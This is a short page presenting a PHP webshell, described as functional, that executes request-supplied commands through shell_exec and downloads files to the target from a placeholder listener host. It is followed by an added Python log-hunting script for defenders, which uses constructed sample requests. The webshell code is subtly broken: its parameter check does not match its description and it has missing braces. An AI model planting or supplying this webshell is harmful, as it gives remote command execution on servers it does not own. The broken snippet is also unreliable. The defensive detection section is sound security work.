A simple but functional PHP webshell. It executes commands passed in the fexec GET param and downloads files to the target via the fdownload GET param. Note that the folder where the downloaded file is saved and the server’s listener IP are hardcoded into the webshell prior to placement on the target.


if (isset($_REQUEST["fupload"])) {
    file_put_contents('/var/tmp/' . $_REQUEST["fdownload"], file_get_contents("http://<LISTENER_IP>/" . $_REQUEST["fdownload"]));
if (isset($_REQUEST["fexec"])) {
    echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";
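
For defenders, an added example (not part of the original page) that hunts web server access logs for requests carrying the parameter names this webshell reads (fexec, fdownload, fupload) and decodes their values for triage. It assumes Apache/nginx combined log format; the sample log lines, addresses and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names read by the webshell shown above (PHP keys are case-sensitive).
SHELL_PARAMS = {"fexec", "fdownload", "fupload"}

# Assumed combined log format: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan_line(line):
    """Return a finding dict if the request carries a webshell parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: not a finding
    url = urlsplit(m["target"])
    # parse_qs percent-decodes values, so the submitted command is readable.
    params = parse_qs(url.query, keep_blank_values=True)
    hits = {k: v for k, v in params.items() if k in SHELL_PARAMS}
    if not hits:
        return None
    return {"src": m["src"], "time": m["ts"], "method": m["method"],
            "path": url.path, "status": int(m["status"]), "params": hits}

def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] '
    '"GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:12:03:44 +0000] '
    '"GET /uploads/img.php?fexec=uname%20-a HTTP/1.1" 200 118 "-" "curl/8.4.0"',
    '203.0.113.9 - - [10/Mar/2024:12:04:10 +0000] '
    '"GET /uploads/img.php?fupload=1&fdownload=tool.bin HTTP/1.1" 200 0 "-" "curl/8.4.0"',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Because the code reads `$_REQUEST`, the same parameters are also accepted in a POST body, which standard access logs do not record. Pair this log hunt with a file-content scan of the web root for request input passed to `shell_exec`.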